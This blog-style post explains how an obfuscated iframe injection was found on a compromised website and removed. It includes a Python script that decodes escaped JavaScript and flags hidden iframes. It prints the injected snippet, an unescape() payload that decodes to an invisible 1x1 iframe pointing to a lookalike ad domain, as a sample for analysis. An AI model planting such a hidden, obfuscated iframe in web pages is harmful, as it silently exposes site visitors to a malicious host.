INTRODUCTION
Obfuscation is the concealment of meaning in communication: it makes the message intentionally ambiguous and harder to interpret. It is basically a form of encryption, although the web page itself is not truly encrypted, or else it would not display when accessed. The web browser can tell this encoded code apart from regular HTML and handle it, but the human eye cannot readily decipher it.
I had a friend who was a victim of these obfuscated iframe injection attacks. When I tested his site, all tests indicated that his site was clean, and yet I knew this could not be the case. I checked all his index.* files and could not find any obvious hidden iframes. What I did notice was some obfuscated code that my friend had no explanation for.
Identifying The Obfuscated iFrame
Doing some research, I found that compromised websites can be infected with hidden iframes and/or with obfuscated (escaped) JavaScript code. My friend's website appeared to be a victim of this obfuscated iframe injection.
The following was the suspected malicious iframe injection obfuscated code:
<Script Language='Javascript'>
<!--
document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));
//-->
</Script>
Researching the issue further, I found some websites that can deobfuscate, or decrypt, the code. Just Google "Javascript DeObfuscator" to find them.
What you do is copy only the obfuscated code, as shown below:
%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D
You then paste the code into the form box they provide and click on "Deobfuscate".
The following was the resulting malicious iframe injection code:
<iframe src= http: //goooogleadsence.***/_click=8F9DA width=1 height=1 style= visibility:hidden;position:absolute ></iframe>
Notice the spelling "goooogleadsence". Looks strange, doesn't it? Once the obfuscated (escaped) JavaScript code was completely removed, my friend's website was clean and safe again.
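As an added example (not code from the original post), the following Python script does offline what the deobfuscator websites described above do: it finds document.write(unescape('...')) calls in a saved copy of a page, expands the escape sequences the way JavaScript's unescape() does (both %XX and %uXXXX forms, which goes slightly beyond the %XX-only sample on this page), and flags any decoded iframe that is 1x1 or styled invisible. The function names and the hidden-iframe heuristic are my own; the sample inputs are the post's own escaped snippet (with its [ ] brackets) plus a constructed benign call, so the script runs offline.

```python
"""Added example: decode escaped JavaScript payloads and flag hidden iframes.

Not part of the original post.  Standard library only.
"""
from __future__ import annotations
import re

# Matches unescape('...') / unescape("...") as seen in injected snippets.
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.DOTALL)
# JavaScript's unescape() understands %uXXXX (Unicode) and %XX (byte) forms.
ESCAPE_SEQ = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(text: str) -> str:
    """Mirror JavaScript's unescape(): expand %XX and %uXXXX sequences."""
    def repl(m: re.Match) -> str:
        code = m.group(1) or m.group(2)
        return chr(int(code, 16))
    return ESCAPE_SEQ.sub(repl, text)


def extract_payloads(html: str) -> list[str]:
    """Return the decoded string of every unescape('...') call in html."""
    return [js_unescape(m.group(2)) for m in UNESCAPE_CALL.finditer(html)]


def _dimension(text: str, name: str) -> int | None:
    """Read an integer width=/height= attribute value, if present."""
    m = re.search(rf"\b{name}\s*=\s*['\"]?(\d+)", text, re.IGNORECASE)
    return int(m.group(1)) if m else None


def looks_like_hidden_iframe(decoded: str) -> bool:
    """Heuristic from the post (assumption, not a formal rule): an iframe
    that is at most 1x1 or styled invisible is suspicious."""
    if "iframe" not in decoded.lower():
        return False
    width, height = _dimension(decoded, "width"), _dimension(decoded, "height")
    tiny = width is not None and height is not None and width <= 1 and height <= 1
    compact = re.sub(r"\s+", "", decoded.lower())
    invisible = "visibility:hidden" in compact or "display:none" in compact
    return tiny or invisible


def scan_html(html: str) -> list[dict]:
    """Decode every unescape() payload in html and label it."""
    return [{"decoded": d, "hidden_iframe": looks_like_hidden_iframe(d)}
            for d in extract_payloads(html)]


# The post's own escaped snippet (the author swapped < > for [ ] so it cannot render).
SAMPLE = """<Script Language='Javascript'>
<!--
document.write(unescape('%5B%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%20%2F%2F%67%6F%6F%6F%6F%67%6C%65%61%64%73%65%6E%63%65%2E%62%69%7A%2F%5F%63%6C%69%63%6B%3D%38%46%39%44%41%20%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%20%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%20%5D%5B%2F%69%66%72%61%6D%65%5D'));
//-->
</Script>"""

# Constructed benign call: escaping is also used for harmless text.
BENIGN = "<script>document.write(unescape('%48%65%6C%6C%6F%u0021'));</script>"

if __name__ == "__main__":
    for label, page in (("sample", SAMPLE), ("benign", BENIGN)):
        for finding in scan_html(page):
            print(label, "hidden_iframe=%s" % finding["hidden_iframe"], finding["decoded"])
```

Run it over a saved copy of each index.* file (read the file and pass its contents to scan_html) rather than a live page, which matches the post's advice to work from a downloaded copy. A payload that decodes to plain text or a visible element is reported but not flagged, which is the "not all iframes are bad" point: the decoded output still needs a human look before anything is deleted.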
CONCLUSION
It is important to remember that not all iframes are bad. Although obfuscation was used here to hide the iframe injection, it can also be used legitimately to hide links such as your download link or your PayPal link. Before you remove a suspected iframe, make sure it is not relevant to your web page. If you are not certain, download a copy of the web page before you delete anything.